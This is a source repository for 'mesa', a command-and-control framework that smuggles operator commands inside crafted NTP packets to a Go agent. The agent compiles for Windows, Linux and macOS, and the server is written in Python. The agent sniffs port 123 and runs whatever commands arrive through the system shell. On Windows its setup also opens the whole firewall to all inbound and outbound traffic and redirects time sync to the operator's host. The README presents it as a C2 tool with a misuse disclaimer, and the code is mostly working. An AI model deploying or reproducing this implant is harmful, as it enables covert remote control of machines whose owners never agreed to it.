├── pythonserver
├── textfiles
│ ├── requirements.txt
│ ├── logo.txt
│ └── history.txt
├── start.py
├── server
│ ├── listener.py
│ ├── c2.py
│ └── ntpserver.py
├── transport
│ └── packets.py
├── teamserver
│ ├── teamserver.py
│ └── db.py
└── prompts.py
├── .gitignore
├── Makefile
├── goclient
├── cmd
│ └── main.go
└── pkg
│ ├── agent
│ └── agent.go
│ └── handler
│ └── handler.go
└── README.md
/pythonserver/textfiles/requirements.txt:
--------------------------------------------------------------------------------
1 | scapy
2 | prompt_toolkit
3 | termcolor
4 | tabulate
5 | mysql.connector
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | __pycache__/
2 | **/__pycache__/
3 | **/**/__pycache__/
4 | .DS_Store
5 | .gitignore
6 | .gitattributes
7 | pythonbase/textfiles/history.txt
8 | **/pycache.sh
9 | todo.txt
10 | goclient/bin/windows-agent.exe
11 | goclient/bin/macos-agent
12 |
--------------------------------------------------------------------------------
/pythonserver/start.py:
--------------------------------------------------------------------------------
1 | from prompts import mesaPrompt
2 | from teamserver import teamserver
3 |
4 | from os import geteuid
5 |
6 |
7 | # Entrypoint
8 | def main():
9 | if geteuid() != 0:
10 | print("[!] You must run as root")
11 | exit(1)
12 | else:
13 | TS = teamserver.Teamserver() # setup NTP and pulls from db
14 | mesaPrompt(TS)
15 |
16 |
17 | main()
18 |
--------------------------------------------------------------------------------
/pythonserver/textfiles/logo.txt:
--------------------------------------------------------------------------------
1 | ⠀⠀⠀⠀ ⠀⠀⢀⣀⣠⣤⣤⣴⣦⣤⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2 | ⠀⠀⠀⠀⠀⠀⢀⣤⣾⣿⣿⣿⣿⠿⠿⠿⠿⣿⣿⣿⣿⣶⣤⡀⠀⠀⠀⠀⠀⠀
3 | ⠀⠀⠀⠀⣠⣾⣿⣿⡿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⢿⣿⣿⣶⡀⠀⠀⠀⠀
4 | ⠀⠀⠀⣴⣿⣿⠟⠁⠀⠀⠀⣶⣶⣶⣶⡆⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⣦⠀⠀⠀
5 | ⠀⠀⣼⣿⣿⠋⠀⠀⠀⠀⠀⠛⠛⢻⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣧⠀⠀
6 | ⠀⢸⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠸⣿⣿⡇⠀
7 | ⠀⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣇⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⠀
8 | ⠀⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⡟⢹⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⣹⣿⣿⠀
9 | ⠀⣿⣿⣷⠀⠀⠀⠀⠀⠀⣰⣿⣿⠏⠀⠀⢻⣿⣿⡄⠀⠀⠀⠀⠀⠀⣿⣿⡿⠀
10 | ⠀⢸⣿⣿⡆⠀⠀⠀⠀⣴⣿⡿⠃⠀⠀⠀⠈⢿⣿⣷⣤⣤⡆⠀⠀⣰⣿⣿⠇⠀
11 | ⠀⠀⢻⣿⣿⣄⠀⠀⠾⠿⠿⠁⠀⠀⠀⠀⠀⠘⣿⣿⡿⠿⠛⠀⣰⣿⣿⡟⠀⠀
12 | ⠀⠀⠀⠻⣿⣿⣧⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⠏⠀⠀⠀
13 | ⠀⠀⠀⠀⠈⠻⣿⣿⣷⣤⣄⡀⠀⠀⠀⠀⠀⠀⢀⣠⣴⣾⣿⣿⠟⠁⠀⠀⠀⠀
14 | ⠀⠀⠀⠀⠀⠀⠈⠛⠿⣿⣿⣿⣿⣿⣶⣶⣿⣿⣿⣿⣿⠿⠋⠁⠀⠀⠀⠀⠀⠀
15 | ⠀⠉⠉⠛⠛⠛⠛⠛⠛⠉⠉⠀⠀⠀
16 | ⠀
17 | The MESA Project ~ d3adzo
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | DIRECTORY=goclient/bin
2 | MAC=macos-agent
3 | LINUX=linux-agent
4 | WIN=windows-agent.exe
5 | FLAGS=-ldflags "-s -w"
6 |
7 |
8 | all: clean create-directory agent-mac agent-windows agent-linux
9 |
10 | create-directory:
11 | mkdir ${DIRECTORY}
12 |
13 | agent-mac:
14 | echo "Compiling macos binary"
15 | env GOOS=darwin GOARCH=amd64 go build ${FLAGS} -o ${DIRECTORY}/${MAC} goclient/cmd/main.go
16 |
17 | agent-windows:
18 | echo "Compiling Windows binary"
19 | env GOOS=windows GOARCH=amd64 go build ${FLAGS} -o ${DIRECTORY}/${WIN} goclient/cmd/main.go
20 |
21 | agent-linux:
22 | echo "Compiling Linux binary"
23 | env CGO_ENABLED=1 GOOS=linux GOARCH=amd64 go build ${FLAGS} -o ${DIRECTORY}/${LINUX} goclient/cmd/main.go
24 |
25 | clean:
26 | rm -rf ${DIRECTORY}
27 |
--------------------------------------------------------------------------------
/goclient/cmd/main.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | "fmt"
5 | "mesa/goclient/pkg/agent"
6 | "mesa/goclient/pkg/handler"
7 | "time"
8 | )
9 |
10 | var newAgent agent.Agent
11 |
12 | func init() {
13 | newAgent = agent.Agent{}
14 | newAgent.OpSys, newAgent.ShellType, newAgent.ShellFlag = agent.DetectOS()
15 | newAgent.IFace = agent.GetNetAdapter(newAgent)
16 | newAgent.ServerIP = []byte{127, 0, 0, 1} //set to IP when compiling
17 | newAgent.MyIP = agent.GetMyIP()
18 | }
19 |
20 | func main() {
21 | fmt.Println(newAgent.ServerIP) //TODO remove
22 |
23 | agent.Setup(newAgent)
24 |
25 | ticker := time.NewTicker(60 * time.Second) //heartbeat ticker
26 | done := make(chan bool)
27 |
28 | go func() {
29 | for {
30 | select {
31 | case <-done:
32 | return
33 | case <-ticker.C:
34 | handler.Heartbeat(newAgent)
35 | }
36 | }
37 | }()
38 |
39 | handler.StartSniffer(newAgent)
40 |
41 | ticker.Stop()
42 | done <- true
43 | }
44 |
45 | /*
46 | recieve beacon, see ping/comd id
47 | parse/decode bytes into readable
48 | ->run commmand
49 | ->get output
50 | ->encode output
51 | ->send output back to c2
52 | */
53 |
--------------------------------------------------------------------------------
/pythonserver/server/listener.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import datetime
3 | from threading import Thread
4 |
5 | from server import c2
6 |
7 |
8 | def start(agentDB):
9 |
10 | serverip = "0.0.0.0"
11 | port = 5000
12 |
13 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
14 | sock.bind((serverip, port))
15 |
16 | datahold = ""
17 | while True:
18 | data, addr = sock.recvfrom(2048)
19 | thread = Thread(
20 | target=handle, args=[data, addr, sock, agentDB, datahold], daemon=True
21 | )
22 | thread.start()
23 |
24 | sock.close()
25 |
26 |
27 | def handle(data, addr, sock, agentDB, datahold):
28 | ip = addr[0]
29 |
30 | strdata = c2.decode(data)
31 |
32 | if (
33 | "COM" in strdata
34 | ): # TODO fix this hsit later, datahold broken and handling of multiple COMOs (ex. sending command to multiple sources and receiving output?)???
35 | idx = strdata.index("COM")
36 | datahold += strdata[idx + 4 :]
37 | if "COMQ" in strdata:
38 | c2.printOutput(datahold, ip)
39 | datahold = "" # return this?
40 |
41 | else: # this means resync/ping
42 | # ntpserver.resync(sock, data, addr)
43 | timestamp = "{:%Y-%m-%d %H:%M:%S}".format(datetime.datetime.now())
44 | agentDB.aliveStatus(ip, timestamp)
45 |
--------------------------------------------------------------------------------
/pythonserver/transport/packets.py:
--------------------------------------------------------------------------------
1 | from scapy.all import IP, UDP, NTP, send
2 |
3 |
4 | class Packet:
5 | def __init__(self, destination):
6 | self.destination = destination
7 | self.baseline = "\x1a\x01\x0a\xf0" + "\x00"*7
8 |
9 |
10 |
11 | class CommandPacket(Packet):
12 | def __init__(self, destination, command):
13 | super().__init__(destination)
14 | self.command = command
15 |
16 | def sendCommandPacket(self):
17 | if len(self.command) > 32:
18 | cmdArr = [self.command[i : i + 32] for i in range(0, len(self.command), 32)]
19 | else:
20 | cmdArr = [self.command]
21 |
22 | #print(cmdArr)
23 | for ctr in range(0, len(cmdArr)):
24 | if ctr < len(cmdArr)-1:
25 | refId = str("COMU".encode('utf-8')).strip('b\'') #Command Unfinished
26 | else:
27 | refId = str("COMD".encode('utf-8')).strip('b\'') #Command Finished
28 |
29 | ucode = str(cmdArr[ctr].encode("utf-8")).strip('b\'')#.strip("\"") #Encoded command
30 |
31 | ntpPayload = self.baseline + refId + ucode +"\x00"*(32-len(cmdArr[ctr]))
32 | ntpPayload = ntpPayload.replace("\\", "").strip("b\'")
33 | """
34 | base64_bytes = base64.b64encode(ntpPayload.encode('utf-8'))
35 |
36 | #outbytes = b''
37 | #for bt in base64_bytes:
38 | #outbytes += bytes([bt ^ ord(chr(46))])
39 |
40 | ntpPayload = str(base64_bytes)
41 | print(len(ntpPayload))
42 | """
43 | #ntpPayload = ntpPayload.replace("\\\\", "\\")
44 |
45 | packet = IP(dst=self.destination)/UDP(dport=123,sport=50000)/(ntpPayload)
46 |
47 | send(packet, verbose=0)
48 |
49 |
50 |
51 | class IDPacket(Packet):
52 | def __init__(self, destination, refId):
53 | super().__init__(destination)
54 | self.refId = refId
55 |
56 | def sendIdPacket(self):
57 | payload = self.baseline
58 | payload += str(self.refId.encode('utf-8')).strip('b\'')
59 | payload += 32*"\x00"
60 | packet = IP(dst=self.destination)/UDP(dport=123,sport=50000)/(payload)
61 |
62 | send(packet, verbose=0)
63 |
64 |
65 | # TODO COMO ref id -> output by client
66 |
--------------------------------------------------------------------------------
/pythonserver/server/c2.py:
--------------------------------------------------------------------------------
1 | from transport import packets
2 | from termcolor import colored
3 |
4 |
5 | def sendRefCMD(tsObj, destGroup, endpoint, refId):
6 | kill = False
7 | if refId == "KILL":
8 | kill = True
9 |
10 | if destGroup == "agent":
11 | if kill:
12 | tsObj.getDBObj().deadStatus(endpoint)
13 |
14 | print(colored(f'[*] Sending Reference "{refId}" ==> ({endpoint})\n', "magenta"))
15 |
16 | iPacket = packets.IDPacket(endpoint, refId)
17 | iPacket.sendIdPacket()
18 |
19 | elif destGroup == "all": # shutdown only
20 | data = tsObj.getDBObj().dbPull()
21 | if len(data) == 0:
22 | return
23 |
24 | for entry in data:
25 | if kill:
26 | tsObj.getDBObj().deadStatus(entry[0])
27 |
28 | print(
29 | colored(
30 | f'[!] Sending Reference "{refId}" ==> ({entry[0]})\n', "magenta"
31 | )
32 | )
33 | iPacket = packets.IDPacket(entry[0], refId)
34 | iPacket.sendIdPacket()
35 |
36 | else:
37 | data = tsObj.getDBObj().pullSpecific(destGroup, endpoint)
38 | for ip in data:
39 | if kill:
40 | tsObj.getDBObj().deadStatus(ip[0])
41 |
42 | print(
43 | colored(
44 | f'[*] Sending Reference "{refId}" ==> {ip[0]} ({endpoint})\n',
45 | "magenta",
46 | )
47 | )
48 |
49 | iPacket = packets.IDPacket(ip[0], refId)
50 | iPacket.sendIdPacket()
51 |
52 |
53 | def sendCMD(tsObj, cmd, destGroup, endpoint):
54 | if destGroup == "agent":
55 | print(colored(f'[*] Sending Command "{cmd}" ==> ({endpoint})\n', "magenta"))
56 | cPacket = packets.CommandPacket(endpoint, cmd)
57 | cPacket.sendCommandPacket()
58 |
59 | else:
60 | data = tsObj.getDBObj().pullSpecific(destGroup, endpoint)
61 | for ip in data:
62 | print(
63 | colored(
64 | f'[*] Sending Command "{cmd}" ==> {ip[0]} ({endpoint})\n', "magenta"
65 | )
66 | )
67 |
68 | cPacket = packets.CommandPacket(ip[0], cmd)
69 | cPacket.sendCommandPacket()
70 |
71 |
72 | def printOutput(datahold, ip):
73 | print("output", datahold, ip) # TODO actual output
74 |
75 |
76 | def decode(data):
77 | # TODO xor single byte decode, return data
78 | strdata = data.decode("latin-1")
79 |
80 | return strdata
81 |
--------------------------------------------------------------------------------
/pythonserver/teamserver/teamserver.py:
--------------------------------------------------------------------------------
1 | from teamserver import db
2 | from server import listener, c2
3 |
4 | from termcolor import colored
5 | from os import system
6 | from threading import Thread
7 | from tabulate import tabulate
8 |
9 |
10 | class Teamserver:
11 | def __init__(self):
12 |
13 | try:
14 | self.agentDB = db.DB()
15 | system("clear")
16 |
17 | except Exception:
18 | print(
19 | colored(
20 | "[-] Problem connecting to the MySQL DB! \n"
21 | " Make sure that the credentials entered are correct/MySQL Server is running. \n"
22 | " Exiting...",
23 | "red",
24 | )
25 | )
26 | exit()
27 |
28 | print("[!] Listening for traffic on port 5000")
29 | self.thread = Thread(target=listener.start, args=[self.agentDB], daemon=True)
30 | self.thread.start()
31 | system("clear")
32 |
33 | def getDBObj(self):
34 | return self.agentDB
35 |
36 | # display the board of active c2s, call again to refresh
37 | def displayBoard(self, all=True, interactType="", id=""):
38 | if interactType == "agent":
39 | interactType = "agentID"
40 |
41 | if all:
42 | data = self.agentDB.dbPull()
43 | else:
44 | data = self.agentDB.pullSpecific(interactType, id)
45 |
46 | if len(data) == 0:
47 | print(colored("[-] No Agents in DB!\n", "red"))
48 | return
49 |
50 | d = []
51 | for entry in data:
52 | d.append(entry)
53 |
54 | print("\n")
55 | print(
56 | colored(
57 | tabulate(
58 | data,
59 | headers=["Agent IP", "OS", "Service", "Status", "Last Ping"],
60 | tablefmt="fancy_grid",
61 | ),
62 | "magenta",
63 | )
64 | )
65 | print("\n")
66 |
67 | def printOutput(self):
68 | pass # TODO print command output
69 | # take into account single/group (one/many) command responses
70 |
71 | def shutdown(self):
72 | if input("Confirm shutdown (y/n) ") == "y":
73 | print(colored("\n[*] Sending KILL Reference to all agents...\n", "yellow"))
74 | c2.sendRefCMD(self, "all", "", "KILL")
75 |
76 | # print(colored("\n Cleaning up...\n", "yellow"))
77 | self.agentDB.cleanDB()
78 |
79 | print(
80 | "\nThe right man in the wrong place can make all the difference in the world.\nSo, wake up, Mr. Freeman. Wake up and smell the ashes.\n"
81 | )
82 | exit(0)
83 |
--------------------------------------------------------------------------------
/goclient/pkg/agent/agent.go:
--------------------------------------------------------------------------------
1 | package agent
2 |
3 | import (
4 | "fmt"
5 | "net"
6 | "os"
7 | "os/exec"
8 | "runtime"
9 | "strings"
10 | )
11 |
12 | //Agent information
13 | type Agent struct {
14 | OpSys string
15 | ShellType string
16 | ShellFlag string
17 | IFace string
18 | ServerIP []byte
19 | MyIP []byte
20 | }
21 |
22 | //Setup - sets up NTP configurations based on OS, sends out first beacon, add firewall rule every 5?
23 | func Setup(newAgent Agent) {
24 | var commandList []string
25 | strIP := net.IP(newAgent.ServerIP).String()
26 |
27 | if newAgent.OpSys == "Windows" {
28 | commandList = []string{
29 | "net start w32time",
30 | "sc config w32time start=auto",
31 | "netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound",
32 | "w32tm /config /syncfromflags:manual /manualpeerlist:" + strIP + " /update",
33 | "w32tm /resync"}
34 | } else if newAgent.OpSys == "Linux" {
35 | commandList = []string{
36 | "apt-get install sntp -y",
37 | "apt-get install libpcap-dev -y",
38 | "sntp -s " + strIP}
39 | } else {
40 | commandList = []string{"sntp -s " + strIP}
41 | }
42 |
43 | for _, s := range commandList {
44 | output, err := exec.Command(newAgent.ShellType, newAgent.ShellFlag, s).Output()
45 |
46 | if err != nil {
47 | fmt.Println(err.Error())
48 | fmt.Println("Couldn't execute command")
49 | }
50 |
51 | fmt.Println(string(output))
52 | }
53 |
54 | }
55 |
56 | //DetectOS - detects which OS agent is running on
57 | func DetectOS() (string, string, string) {
58 | sys := "Unknown"
59 | shell := "temp"
60 | flag := "temp"
61 | if runtime.GOOS == "windows" {
62 | sys = "Windows"
63 | shell = "cmd"
64 | flag = "/c"
65 | } else if runtime.GOOS == "linux" {
66 | sys = "Linux"
67 | shell = "/bin/sh"
68 | flag = "-c"
69 | } else if runtime.GOOS == "darwin" {
70 | sys = "macOS"
71 | shell = "/bin/sh"
72 | flag = "-c"
73 | } else {
74 | fmt.Println("operating system not detected")
75 | os.Exit(1)
76 | }
77 |
78 | return sys, shell, flag
79 | }
80 |
81 | //GetNetAdapter - gets network interface of agent
82 | func GetNetAdapter(newAgent Agent) string {
83 | var iface string
84 | if runtime.GOOS == "windows" {
85 | output, err := exec.Command(newAgent.ShellType, newAgent.ShellFlag, "getmac /fo csv /v | findstr Ethernet").Output() //getting ethernet description for pcap
86 | if err != nil {
87 | fmt.Println(err.Error())
88 | fmt.Println("Couldn't execute command")
89 | }
90 | startIndex := strings.Index(string(output), "_{")
91 | finalIndex := strings.Index(string(output), "}")
92 |
93 | temp := string(output)[startIndex+2 : finalIndex]
94 | iface := "\\Device\\NPF_{" + temp + "}"
95 |
96 | return iface
97 | } else {
98 | potentials := [4]string{"eth0", "en0", "ens33"}
99 |
100 | devices, err := net.Interfaces()
101 |
102 | if err != nil {
103 | fmt.Println("error gathering nics")
104 | }
105 |
106 | iface = "eth0" //default
107 | for _, device := range devices {
108 | for i := 0; i < len(potentials); i++ {
109 | if strings.Contains(strings.ToLower(device.Name), strings.ToLower(potentials[i])) {
110 | iface = device.Name
111 | goto End
112 | }
113 | }
114 | }
115 | }
116 | End:
117 | return iface
118 | }
119 |
120 | //GetMyIP - gets local IP
121 | func GetMyIP() []byte {
122 | addrs, err := net.InterfaceAddrs()
123 | if err != nil {
124 | os.Stderr.WriteString("Oops: " + err.Error() + "\n")
125 | os.Exit(1)
126 | }
127 |
128 | for _, a := range addrs {
129 | if ipnet, ok := a.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
130 | if ipnet.IP.To4() != nil {
131 | return ipnet.IP
132 | }
133 | }
134 | }
135 | return nil
136 | } //function code taken from github.com/emmuanuel/DiscordGo
137 |
--------------------------------------------------------------------------------
/goclient/pkg/handler/handler.go:
--------------------------------------------------------------------------------
1 | package handler
2 |
3 | import (
4 | "bytes"
5 | _ "context"
6 | "fmt"
7 | "log"
8 | "mesa/goclient/pkg/agent"
9 | "net"
10 | "os/exec"
11 | "strings"
12 |
13 | "github.com/google/gopacket"
14 | _ "github.com/google/gopacket/layers"
15 | "github.com/google/gopacket/pcap"
16 | )
17 |
18 | func StartSniffer(newAgent agent.Agent) {
19 | msg := ""
20 | for {
21 |
22 | var (
23 | iface = newAgent.IFace
24 | buffer = int32(1600)
25 | filter = "udp and port 123 and dst " + net.IP(newAgent.MyIP).String()
26 | )
27 |
28 | handler, err := pcap.OpenLive(iface, buffer, false, pcap.BlockForever)
29 | if err != nil {
30 | log.Fatal(err)
31 | }
32 |
33 | defer handler.Close()
34 |
35 | if err := handler.SetBPFFilter(filter); err != nil {
36 | log.Fatal(err)
37 | }
38 |
39 | source := gopacket.NewPacketSource(handler, handler.LinkType())
40 | for packet := range source.Packets() {
41 | ret, cont := harvestInfo(packet, newAgent)
42 | if strings.Contains(cont, "COM") {
43 | msg += ret
44 | }
45 |
46 | if cont == "COMD" {
47 | runCommand(msg, newAgent)
48 | msg = ""
49 | } else if cont == "KILL" {
50 | if newAgent.OpSys == "Windows" {
51 | runCommand("net stop w32time", newAgent)
52 | runCommand("w32tm /unregister", newAgent)
53 | } else {
54 | //runCommand()
55 | fmt.Println("run kill command fix this") //TODO add linux commands cleanup
56 | }
57 | return
58 | } else if cont == "PING" { //resync
59 | Heartbeat(newAgent)
60 | } else {
61 | continue
62 | }
63 | }
64 | }
65 |
66 | }
67 |
68 | func harvestInfo(packet gopacket.Packet, newAgent agent.Agent) (string, string) {
69 | ipLayer := packet.NetworkLayer()
70 | ipLayerBytes := ipLayer.LayerContents()
71 | srcIP := ipLayer.LayerContents()[len(ipLayerBytes)-8 : len(ipLayerBytes)-4]
72 | app := packet.ApplicationLayer()
73 |
74 | if bytes.Compare(srcIP, newAgent.ServerIP) != 0 { //solves DHCP issue
75 | newAgent.ServerIP = srcIP
76 | agent.Setup(newAgent)
77 | }
78 |
79 | if app != nil {
80 | final := decode(app.LayerContents())
81 | index := strings.Index(final, "COM")
82 | if strings.Contains(final, "COMU") {
83 | return final[index+4:], "COMU"
84 | } else if strings.Contains(final, "COMD") {
85 | return final[index+4:], "COMD"
86 | } else if strings.Contains(final, "KILL") {
87 | return "", "KILL"
88 | } else if strings.Contains(final, "PING") {
89 | return "", "PING" //TODO server auto pings agent if goes to MIA, hoping for change response. also updates NTP server information on box
90 | }
91 | }
92 | return "ignore", "ignore"
93 | }
94 |
95 | func runCommand(msg string, newAgent agent.Agent) {
96 | fmt.Print("Command: ")
97 | fmt.Println(msg)
98 | output, err := exec.Command(newAgent.ShellType, newAgent.ShellFlag, msg).Output()
99 |
100 | if err != nil {
101 | fmt.Println(err.Error())
102 | fmt.Println("Couldn't execute command")
103 | }
104 |
105 | fmt.Println(string(output))
106 | }
107 |
108 | func decode(content []byte) string {
109 | /*var newContent []byte
110 |
111 | print(content)
112 | for i := 0; i < len(content); i++ {
113 | newContent = append(newContent, content[i]^byte('.')) //XOR single byte decoding
114 | }
115 | fmt.Println(newContent)*/
116 | content = bytes.Trim(content, "\x00")
117 | return string(content)
118 | //TODO fix later with single XOR byte
119 | }
120 |
121 | func Heartbeat(newAgent agent.Agent) {
122 | if newAgent.OpSys == "Windows" {
123 | runCommand("w32tm /resync", newAgent)
124 | } else {
125 | runCommand("sntp -s "+net.IP(newAgent.ServerIP).String(), newAgent) //TODO actual linux command
126 | }
127 | }
128 |
129 | //encode and send traffic
130 | /*
131 | func encode(output []byte, handler *pcap.Handle, newAgent agent.Agent) {
132 | buf := gopacket.NewSerializeBuffer()
133 | opts := gopacket.SerializeOptions{}
134 | gopacket.SerializeLayers(buf, opts,
135 | &layers.Ethernet{},
136 | &layers.IPv4{},
137 | &layers.TCP{},
138 | gopacket.Payload([]byte{1, 2, 3, 4}))
139 | packetData := buf.Bytes()
140 | }*/
141 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # mesa
2 | In-progress C2 utlizing NTP as transport protocol.
3 |
4 | This doubles as both a valid, working NTP time server and a command and control server.
5 |
6 | TODO:
7 | - [x] Server functions as a legitimate NTP Server
8 | - [x] Commands/References are sent via custom NTP packets
9 | - [x] Server handles multiple concurrent connections
10 | - [x] Agent works on Windows, Linux, and macOS
11 | - [x] Easy agent grouping (OS and Service)
12 | - [ ] Single Byte XOR Encryption and Decryption (implemented but broken currently)
13 | - [ ] Command Output (single and multiple)
14 |
15 | The creator is not liable for the misuse of any of the following code.
16 |
17 | ## Installation
18 | ### Server
19 | Python3 must be utilized. Python2 will not work.
20 |
21 | Certain external packages are also used. See **Packages Installed** for list.
22 |
23 | Use `pip3 install -r pythonserver/textfiles/requirements.txt` to install.
24 |
25 | #### Server Database
26 | Connection to a local MySQL server is required. Agent data is stored and pulled here.
27 | I used a local MySQL 5.7 server.
28 |
29 | ### Agent
30 | Golang must be installed. The Makefile uses `go build` .
31 |
32 | Certain external packages are also used. See **Packages Installed** for list.
33 |
34 | Use `go get ` to install.
35 |
36 | ## Usage
37 | ### Server
38 | Run `sudo python3 start.py`
39 |
40 | You will be asked for MySQL credentials, this is for creating a database and saving state.
41 |
42 | Once the SQL connection has been made, the listener will start. You will reach the prompts, which is where you will interact with the program.
43 |
44 | Enter `help` or use the TAB key for a list of commands at of the prompt levels.
45 |
46 | #### Mesa Prompt
47 | This is your main prompt. Display the agent table, enter the DB subprompt, interact with an agent / group of agents, or exit/shutdown.
48 |
49 | Commands:
50 | - `agents` ~ display the board of agent entries.
51 | - `db` ~ enter the database subprompt.
52 | - `interact ` ~ enter the interact subprompt.
53 | - `help` ~ display this list of commands.
54 | - `exit` ~ quit the program, state will be saved.
55 | - `shutdown` ~ quit the program, all agents are killed, database is cleaned.
56 | ---
57 | #### DB Prompt
58 | This is the DB subprompt. This is where certain DB actions will take place, like adding groupings, removing agents, or describing the agents table.
59 |
60 | Commands:
61 | - `agents` ~ display the board of agent entries.
62 | - `group ` ~ add a service identifier to an agent. Can specify a IP range. Ex. \"group 10.1.1-15.3 service SMB\"
63 | - `removeall` ~ remove all agents from the database.
64 | - `help` ~ display this list of commands.
65 | - `meta` ~ describe the agent tables metadata.
66 | - `back` ~ return to the main prompt.
67 | ---
68 | #### Interact Prompt
69 | This is the interaction subprompt. Send PING or KILL references to agents, or enter the CMD subprompt.
70 |
71 | Commands:
72 | - `ping` ~ ping agent.
73 | - `kill` ~ send kill command to agent. confirmed with y/n.
74 | - `cmd` ~ enter the cmd subprompt.
75 | - `help` ~ display this list of commands.
76 | - `back` ~ return to the main prompt.
77 | ---
78 | #### CMD Prompt
79 |
80 | This is the command subprompt. Send commands to agents here.
81 |
82 | Commands:
83 | - `` ~ send command `` to agents.
84 | - `help` ~ display this list of commands.
85 | - `back` ~ return to the interact prompt.
86 | ---
87 | ### Client
88 | Run `make`
89 |
90 | This will cross-compile agents.
91 | - Windows -> `windows-agent.exe`
92 | - Linux -> `linux-agent` (currently broken, must be compiled separately on a linux machine)
93 | - macOS -> `macos-agent`
94 |
95 | Once an agent is run, they will setup on the machine and sync with the server. An entry will be added to the server's database, and the agent can now be controlled.
96 |
97 | Agents are hardcoded with C2's server IP when compiled, but sending a `PING` Reference (Interact Subprompt) will update the target machine's config.
98 |
99 | ## Packages Used
100 | ### Python3
101 | - scapy
102 | - prompt_toolkit
103 | - termcolor
104 | - tabulate
105 | - mysql.connector
106 |
107 | Use `pip3 install -r pythonserver/textfiles/requirements.txt` to install.
108 |
109 | ### Golang
110 | - github.com/google/gopacket
111 | - github.com/google/gopacket/layers
112 | - github.com/google/gopacket/pcap
113 |
114 | Use `go get ` to install.
115 |
116 | ## References
117 |
118 | Big thank you to @emmaunel for all the help, check out his C2 project DiscordGO (inspiration!)
119 | - https://github.com/emmaunel/DiscordGo
120 |
121 | NTP Server modified:
122 | - https://github.com/sumit-1/ntpserver/blob/master/ntpserver.py
123 |
124 | Helpful for using Scapy for NTP:
125 | - https://gist.github.com/Dbof/178cf3c4b9eee423b293c51380cd311b
126 |
127 |
--------------------------------------------------------------------------------
/pythonserver/server/ntpserver.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import socket
3 | import struct
4 | import time
5 | import threading
6 | import select
7 | import sys
8 | import queue as Queue
9 |
10 | """
11 | THIS CODE WAS TAKEN FROM https://github.com/sumit-1/ntpserver AND MODIFIED BY ME
12 | """
13 |
14 | def system_to_ntp_time(timestamp):
15 | return timestamp + NTP.NTP_DELTA
16 |
17 | def _to_int(timestamp):
18 | return int(timestamp)
19 |
20 | def _to_frac(timestamp, n=32):
21 | return int(abs(timestamp - _to_int(timestamp)) * 2**n)
22 |
23 | def _to_time(integ, frac, n=32):
24 | return integ + float(frac)/2**n
25 |
26 |
27 | class NTP:
28 | """Helper class defining constants."""
29 |
30 | _SYSTEM_EPOCH = datetime.date(*time.gmtime(0)[0:3])
31 | """system epoch"""
32 | _NTP_EPOCH = datetime.date(1900, 1, 1)
33 | """NTP epoch"""
34 | NTP_DELTA = (_SYSTEM_EPOCH - _NTP_EPOCH).days * 24 * 3600
35 | """delta between system and NTP time"""
36 |
37 | REF_ID_TABLE = {
38 | 'DNC': "DNC routing protocol",
39 | 'NIST': "NIST public modem",
40 | 'TSP': "TSP time protocol",
41 | 'DTS': "Digital Time Service",
42 | 'ATOM': "Atomic clock (calibrated)",
43 | 'VLF': "VLF radio (OMEGA, etc)",
44 | 'callsign': "Generic radio",
45 | 'LORC': "LORAN-C radionavidation",
46 | 'GOES': "GOES UHF environment satellite",
47 | 'GPS': "GPS UHF satellite positioning",
48 | }
49 | """reference identifier table"""
50 |
51 | STRATUM_TABLE = {
52 | 0: "unspecified",
53 | 1: "primary reference",
54 | }
55 | """stratum table"""
56 |
57 | MODE_TABLE = {
58 | 0: "unspecified",
59 | 1: "symmetric active",
60 | 2: "symmetric passive",
61 | 3: "client",
62 | 4: "server",
63 | 5: "broadcast",
64 | 6: "reserved for NTP control messages",
65 | 7: "reserved for private use",
66 | }
67 | """mode table"""
68 |
69 | LEAP_TABLE = {
70 | 0: "no warning",
71 | 1: "last minute has 61 seconds",
72 | 2: "last minute has 59 seconds",
73 | 3: "alarm condition (clock not synchronized)",
74 | }
75 | """leap indicator table"""
76 |
77 |
78 | class NTPPacket:
79 |
80 | _PACKET_FORMAT = "!B B B b 11I"
81 | """packet format to pack/unpack"""
82 |
83 | def __init__(self, version=2, mode=3, tx_timestamp=0):
84 |
85 | self.leap = 0
86 | """leap second indicator"""
87 | self.version = version
88 | """version"""
89 | self.mode = mode
90 | """mode"""
91 | self.stratum = 0
92 | """stratum"""
93 | self.poll = 0
94 | """poll interval"""
95 | self.precision = 0
96 | """precision"""
97 | self.root_delay = 0
98 | """root delay"""
99 | self.root_dispersion = 0
100 | """root dispersion"""
101 | self.ref_id = 0
102 | """reference clock identifier"""
103 | self.ref_timestamp = 0
104 | """reference timestamp"""
105 | self.orig_timestamp = 0
106 | self.orig_timestamp_high = 0
107 | self.orig_timestamp_low = 0
108 | """originate timestamp"""
109 | self.recv_timestamp = 0
110 | """receive timestamp"""
111 | self.tx_timestamp = tx_timestamp
112 | self.tx_timestamp_high = 0
113 | self.tx_timestamp_low = 0
114 | """tansmit timestamp"""
115 |
116 | def to_data(self):
117 | try:
118 | packed = struct.pack(NTPPacket._PACKET_FORMAT,
119 | (self.leap << 6 | self.version << 3 | self.mode),
120 | self.stratum,
121 | self.poll,
122 | self.precision,
123 | _to_int(self.root_delay) << 16 | _to_frac(self.root_delay, 16),
124 | _to_int(self.root_dispersion) << 16 |
